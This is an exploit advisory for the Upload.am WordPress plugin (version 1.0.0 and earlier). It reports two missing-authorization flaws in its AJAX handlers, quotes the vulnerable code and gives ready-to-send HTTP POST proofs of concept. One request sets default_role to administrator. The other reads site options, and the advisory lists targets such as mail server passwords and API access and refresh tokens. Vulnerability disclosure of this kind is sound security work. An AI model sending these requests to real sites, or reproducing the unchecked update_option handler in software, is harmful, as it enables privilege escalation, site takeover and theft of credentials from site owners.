# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities
# Date: Aug 12, 2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/
# Version: <= 1.0.0
# Tested on: MacOS, localhost xampp
# Authentication required: Low privilege
Critical: Unauthorized Settings Modification (CWE-862)
CVE-ID: N/A
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
Affected File: upload-am-file-hosting-vpn.php:283-291
Vulnerable Code:
283: add_action('wp_ajax_upload_am_update_option', function () {
284: check_ajax_referer('upload_am_nonce', 'nonce');
285: if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) {
286: wp_send_json_error(['message' => 'Missing required parameters']);
287: }
288: $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
289: $option_value = sanitize_text_field(wp_unslash($_POST['option_value']));
290: update_option($option_name, $option_value);
291: wp_send_json_success(['message' => 'Option updated']);
Input Source:
Parameter: $_POST['option_name'] and $_POST['option_value']
Flow: User input -> sanitize_text_field() -> update_option() with no capability check
Impact:
Complete WordPress configuration control allowing:
Privilege escalation (setting default_role to administrator)
Site takeover (modifying admin_email, siteurl)
Security bypass (disabling security plugins via active_plugins option)
Malicious redirections and content injection
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value
action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE
============================================================================================================
High: Sensitive Information Disclosure (CWE-200)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Affected File: upload-am-file-hosting-vpn.php:275-281
Vulnerable Code:
275: add_action('wp_ajax_upload_am_get_option', function () {
276: check_ajax_referer('upload_am_nonce', 'nonce');
277: if (!isset($_POST['option_name'])) {
278: wp_send_json_error(['message' => 'Missing option_name']);
279: }
280: $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
281: $value = get_option($option_name);
282: wp_send_json_success($value);
Parameter: $_POST['option_name']
Flow: User input -> sanitize_text_field() -> get_option() -> JSON response
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value
action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE
Additional sensitive options that can be extracted:
option_name=mailserver_login
option_name=mailserver_pass
# Site configuration
option_name=admin_email
option_name=users_can_register
option_name=active_plugins
option_name=siteurl
option_name=home
# Authentication tokens
option_name=upload_am_access_token
option_name=upload_am_refresh_token
Impact:
Exposure of sensitive WordPress configuration including:
API tokens and credentials
Plugin/theme configuration
Administrative email addresses
Site URLs and security settings